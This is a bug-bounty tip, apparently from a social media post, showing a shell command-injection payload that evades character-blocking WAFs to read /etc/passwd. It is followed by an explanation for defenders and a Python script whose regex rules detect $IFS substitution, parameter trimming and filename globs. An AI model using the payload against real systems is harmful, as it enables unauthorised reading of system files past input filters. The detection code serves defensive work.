Protip:
If you find an OS command injection vulnerability but a WAF blocks payloads containing special characters like (/”‘&|()-;:.,`), it is still possible to bypass it.
E.g., for the /etc/passwd file:
cat$IFS$9${PWD%%[a-z]*}e*c${PWD%%[a-z]*}p?ss??
#bugbountytips
Cr : Aysar Harb https://t.co/nlqKpuvZ7Z
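For defenders, the string above shows why a blocklist of literal characters is the wrong layer to filter on: the blocked characters are produced by the shell at run time, so the check has to match the expansion syntax. The sketch below is an added example, not part of the original tip; the rule names, the `scan` helper and all sample values other than the tip's own string are constructed for illustration.

```python
import re
from urllib.parse import quote, unquote_plus

# Match the shell expansion syntax itself; the characters it produces ("/",
# whitespace) only exist after the shell has run, so a literal-character
# blocklist never sees them.
RULES = {
    # $IFS or ${IFS}: the field separator standing in for a space
    "ifs_separator": re.compile(r"\$\{?IFS\b"),
    # ${VAR%pat}, ${VAR%%pat}, ${VAR#pat}, ${VAR##pat}: trimming a variable
    "param_trim": re.compile(r"\$\{[A-Za-z_][A-Za-z0-9_]*(?:%%?|##?)[^}]*\}"),
    # * or ? touching a word character: a glob completing a name.
    # Noisy on free text; intended for fields that hold a host or file name.
    "glob_in_word": re.compile(r"\w[*?]|[*?]\w"),
}


def scan(value: str) -> list[str]:
    """Return the sorted names of the rules hit by a raw or URL-decoded value."""
    candidates = {value, unquote_plus(value)}
    return sorted(name for name, rx in RULES.items()
                  if any(rx.search(c) for c in candidates))


# The first sample is the string from the tip above; the rest are constructed.
SAMPLES = [
    "cat$IFS$9${PWD%%[a-z]*}e*c${PWD%%[a-z]*}p?ss??",
    "192.168.1.10",
    "build-server-01.example.com",
    "report_2024.txt",
]

if __name__ == "__main__":
    for s in SAMPLES:
        for form in (s, quote(s, safe="")):
            print(f"{scan(form) or 'clean'}  <-  {form}")
```

Pattern matching like this is a detection aid only; the fix for the underlying bug is to stop passing user input through a shell and to validate the field against an allowlist of expected values.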